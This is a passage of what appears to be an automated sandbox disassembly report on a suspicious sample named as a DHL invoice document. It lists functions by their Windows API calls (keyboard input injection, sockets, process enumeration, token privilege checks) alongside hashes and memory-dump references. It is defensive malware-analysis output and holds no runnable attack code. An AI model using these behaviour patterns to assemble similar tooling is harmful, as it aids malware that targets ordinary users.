                                                                                                                        • Instruction ID: 96b47279452b40b812e9ec48536101cbe77568ce69f1a9b7a005ebf95e6073ec
                                                                                                                        • Opcode Fuzzy Hash: 0f1749d1a5c5d3131b9833cd770872354c3de9b9966bf75907c0d63dbff41b99
                                                                                                                        • Instruction Fuzzy Hash: 9E11B4B16002056BDF167F748CDAEEE776AAF84304F048075FA19DF252DE3099458B60
                                                                                                                        Function 003C5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003C58C1
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003C58EE
                                                                                                                        • DrawMenuBar.USER32(?), ref: 003C58FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                        • Opcode ID: 712ffba6e91ed3cfe9f19bffecb5f01069dc43963cb45f2dcc9ddbb03f2c0704
                                                                                                                        • Instruction ID: b9b48dc4dfb0c8c3492e903804067e42f98782618e34e2fe48aa2753977b34c0
                                                                                                                        • Opcode Fuzzy Hash: 712ffba6e91ed3cfe9f19bffecb5f01069dc43963cb45f2dcc9ddbb03f2c0704
                                                                                                                        • Instruction Fuzzy Hash: 39011B32510218EFDB229F12DC44FAEBBB8FB45361F148099E849DA151DB30AAD4DF21
                                                                                                                        Function 003C7803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,004018B0,003CA364,000000FC,?,00000000,00000000,?,?,?,003876CF,?,?,?,?,?), ref: 003C7805
                                                                                                                        • GetFocus.USER32 ref: 003C780D
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                                                                                                                        • SendMessageW.USER32(00E8E8F0,000000B0,000001BC,000001C0), ref: 003C787A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3601265619-2513823414
                                                                                                                        • Opcode ID: 7c933dd32914981348f2ee5f92928f24e1c8878d3b3d81ba1ab5bcaf1882c1f4
                                                                                                                        • Instruction ID: 66d311468909b611a432dfeecde02adf718e277575a29993cdc7cde0e6872262
                                                                                                                        • Opcode Fuzzy Hash: 7c933dd32914981348f2ee5f92928f24e1c8878d3b3d81ba1ab5bcaf1882c1f4
                                                                                                                        • Instruction Fuzzy Hash: EB017C326052008FC326DB28D959FA637EAEF8A320F19026DE515CB2B0CB316C02CF40
                                                                                                                        Function 0039007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6ae21e96537805ad2d5cdff8e1f1d013085addd93cbb6fa200dde110e8059658
                                                                                                                        • Instruction ID: 7952a59a34b0024eb6c6425408a3a8e67312819ddd5da768460febf375a634dc
                                                                                                                        • Opcode Fuzzy Hash: 6ae21e96537805ad2d5cdff8e1f1d013085addd93cbb6fa200dde110e8059658
                                                                                                                        • Instruction Fuzzy Hash: D2C17D75A00216EFDB19CFA8C894EAEB7B5FF48704F218598E905EB251D731ED41CB90
                                                                                                                        Function 003B342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1998397398-0
                                                                                                                        • Opcode ID: b3aa8a021dab413752a1192a4729f63c72c2fbe13c0ac80dc81a12fc26249258
                                                                                                                        • Instruction ID: 39a6339a694947cbd09cc88ae2cd981bb1cb12736947a94883cdea2589b973c1
                                                                                                                        • Opcode Fuzzy Hash: b3aa8a021dab413752a1192a4729f63c72c2fbe13c0ac80dc81a12fc26249258
                                                                                                                        • Instruction Fuzzy Hash: EEA169756042109FDB16DF28C485A6AB7E4FF89714F048859FA8A9F762DB30EE01CB91
                                                                                                                        Function 00390436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003CFC08,?), ref: 003905F0
                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003CFC08,?), ref: 00390608
                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,003CCC40,000000FF,?,00000000,00000800,00000000,?,003CFC08,?), ref: 0039062D
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0039064E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314563124-0
                                                                                                                        • Opcode ID: a30ef32ad6bd7fb85104252263d7dc0ac8a43f6c8eb903290f48e436199a26b6
                                                                                                                        • Instruction ID: 0287adb3b0a8273f18655b74248f4e2e641db73bac277d11af275b843eaba305
                                                                                                                        • Opcode Fuzzy Hash: a30ef32ad6bd7fb85104252263d7dc0ac8a43f6c8eb903290f48e436199a26b6
                                                                                                                        • Instruction Fuzzy Hash: 7E81F675A00209EFCF05DF94C984EEEB7B9FF89315F214598E506AB250DB71AE06CB60
                                                                                                                        Function 00371391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: b84fdce10d1dcad321e00ab847630717fe4d71d23673e7a102a4a0aad89472c3
                                                                                                                        • Instruction ID: 6041e57726239dbaba713a191d0e20426d6defc1c0e24752aac5c2629aff34e0
                                                                                                                        • Opcode Fuzzy Hash: b84fdce10d1dcad321e00ab847630717fe4d71d23673e7a102a4a0aad89472c3
                                                                                                                        • Instruction Fuzzy Hash: B6415C77A00100ABDB376BBE8C46AAE3AB9EF42370F15C625F81DDB191E67848419361
                                                                                                                        Function 003B1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 003B1AFD
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B1B0B
                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003B1B8A
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B1B94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$socket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1881357543-0
                                                                                                                        • Opcode ID: a72fa48615186b59f189936bf2c316f89373f2c531d6e7cfb210b72e89ccf3dc
                                                                                                                        • Instruction ID: 07ac6be2a5e29c12fe5d4e7674b787a493be236ba31983b77a861808f7381009
                                                                                                                        • Opcode Fuzzy Hash: a72fa48615186b59f189936bf2c316f89373f2c531d6e7cfb210b72e89ccf3dc
                                                                                                                        • Instruction Fuzzy Hash: 4441D074600200AFE722EF24C896F6A77E5AB44718F54C44CFA1A9F7D2D772ED418B90
                                                                                                                        Function 0036B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9a638526fe37b4432196e789eb32d7c35dc50707121ee435eec43fd61e11d368
                                                                                                                        • Instruction ID: 5d371bf01c63108c4d131a37dc13f0b10445012ff5e954affca1449b54e20483
                                                                                                                        • Opcode Fuzzy Hash: 9a638526fe37b4432196e789eb32d7c35dc50707121ee435eec43fd61e11d368
                                                                                                                        • Instruction Fuzzy Hash: 28413876A00314AFD727AF38CC41BAABBA9EF84710F10C52AF546DF692D77199418B80
                                                                                                                        Function 003A56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003A5783
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 003A57A9
                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003A57CE
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003A57FA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3321077145-0
                                                                                                                        • Opcode ID: 19a8504edf2f6c50d4cc1ac35020d059488f5fd39784ec14cb735979ac2962ec
                                                                                                                        • Instruction ID: 327de44f164d823fab64d5e995d4a68a861ff5bf2da3962d56f0585643aeb1d4
                                                                                                                        • Opcode Fuzzy Hash: 19a8504edf2f6c50d4cc1ac35020d059488f5fd39784ec14cb735979ac2962ec
                                                                                                                        • Instruction Fuzzy Hash: 3D411C3A600610DFDB26DF15C484A19BBE5EF4A720F198488E84AAF362CB35FD00CB91
                                                                                                                        Function 0036D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00356D71,00000000,00000000,003582D9,?,003582D9,?,00000001,00356D71,?,00000001,003582D9,003582D9), ref: 0036D910
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0036D999
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0036D9AB
                                                                                                                        • __freea.LIBCMT ref: 0036D9B4
                                                                                                                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2652629310-0
                                                                                                                        • Opcode ID: c24c39175d5dffa5880bdb20348a379384826065f72090ec39f2548dc30fbdda
                                                                                                                        • Instruction ID: 8d628887c00fc4b98165a23cb6f0c892c5b4c72468bf6b198b5339dbb5599a8c
                                                                                                                        • Opcode Fuzzy Hash: c24c39175d5dffa5880bdb20348a379384826065f72090ec39f2548dc30fbdda
                                                                                                                        • Instruction Fuzzy Hash: 6431B072A0020AABDF269F65DC45EAF7BA9EB41310F068168FC04DB154EB35DD54CB90
                                                                                                                        Function 0039AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0039ABF1
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0039AC0D
                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0039AC74
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0039ACC6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: e1c6819ac7d299b80c0e73a400b88580ae774e7473eb7648a0d936d82729d169
                                                                                                                        • Instruction ID: 21afedfea06e8f520edcd6008992c66a827fa43bb577a5806e30657b10680d71
                                                                                                                        • Opcode Fuzzy Hash: e1c6819ac7d299b80c0e73a400b88580ae774e7473eb7648a0d936d82729d169
                                                                                                                        • Instruction Fuzzy Hash: B1313970A04B186FFF37CB698C04BFA7BA9AB85311F04471AE485DA1D0C37499818BD2
                                                                                                                        Function 003C16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 003C16EB
                                                                                                                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                                                                                                                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                                                                                                                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                                                                                                                        • GetCaretPos.USER32(?), ref: 003C16FF
                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 003C174C
                                                                                                                        • GetForegroundWindow.USER32 ref: 003C1752
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2759813231-0
                                                                                                                        • Opcode ID: 9f848b59ad7cc6362cd0cc167655cebade54c9d136c934e9b351ffae2ac5fe88
                                                                                                                        • Instruction ID: d05d3caa42a03390d0c504ba2700c006c6276f29784361a6ee7883597e723079
                                                                                                                        • Opcode Fuzzy Hash: 9f848b59ad7cc6362cd0cc167655cebade54c9d136c934e9b351ffae2ac5fe88
                                                                                                                        • Instruction Fuzzy Hash: 06313075D00149AFCB05EFA9C8C5DAEB7FDEF49304B5080A9E415EB212D631AE45CFA0
                                                                                                                        Function 0039D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0039D501
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0039D50F
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0039D52F
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0039D5DC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 420147892-0
                                                                                                                        • Opcode ID: a3fff9ed887d1be86591b0bb1b312ddd7231df756bca8b0d37a017f284c50e4c
                                                                                                                        • Instruction ID: c0eec102c60e0781f6519c89cc481415bd8f4bdffa4fb902937f28755496a902
                                                                                                                        • Opcode Fuzzy Hash: a3fff9ed887d1be86591b0bb1b312ddd7231df756bca8b0d37a017f284c50e4c
                                                                                                                        • Instruction Fuzzy Hash: 133193711083009FD702EF54C882AAFBBE8EF99354F14092DF5858A1A1EB71A949CB92
                                                                                                                        Function 0039D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,003CCB68), ref: 0039D2FB
                                                                                                                        • GetLastError.KERNEL32 ref: 0039D30A
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0039D319
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003CCB68), ref: 0039D376
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2267087916-0
                                                                                                                        • Opcode ID: d4ffe0d13b15ea6bafa087f31f56e7d90e32d7183337bb29447e168bdc038c8d
                                                                                                                        • Instruction ID: 5c0115bedb4d847c52ad2689509a157380ad01b8d9e9e94939d167c4be403e82
                                                                                                                        • Opcode Fuzzy Hash: d4ffe0d13b15ea6bafa087f31f56e7d90e32d7183337bb29447e168bdc038c8d
                                                                                                                        • Instruction Fuzzy Hash: CB219F74508201DF8B02DF28C8C28AAB7E8AF56365F104A1DF499C72A1D731DD46CB93
                                                                                                                        Function 00391571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00391014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0039102A
                                                                                                                          • Part of subcall function 00391014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00391036
                                                                                                                          • Part of subcall function 00391014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391045
                                                                                                                          • Part of subcall function 00391014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0039104C
                                                                                                                          • Part of subcall function 00391014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391062
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003915BE
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 003915E1
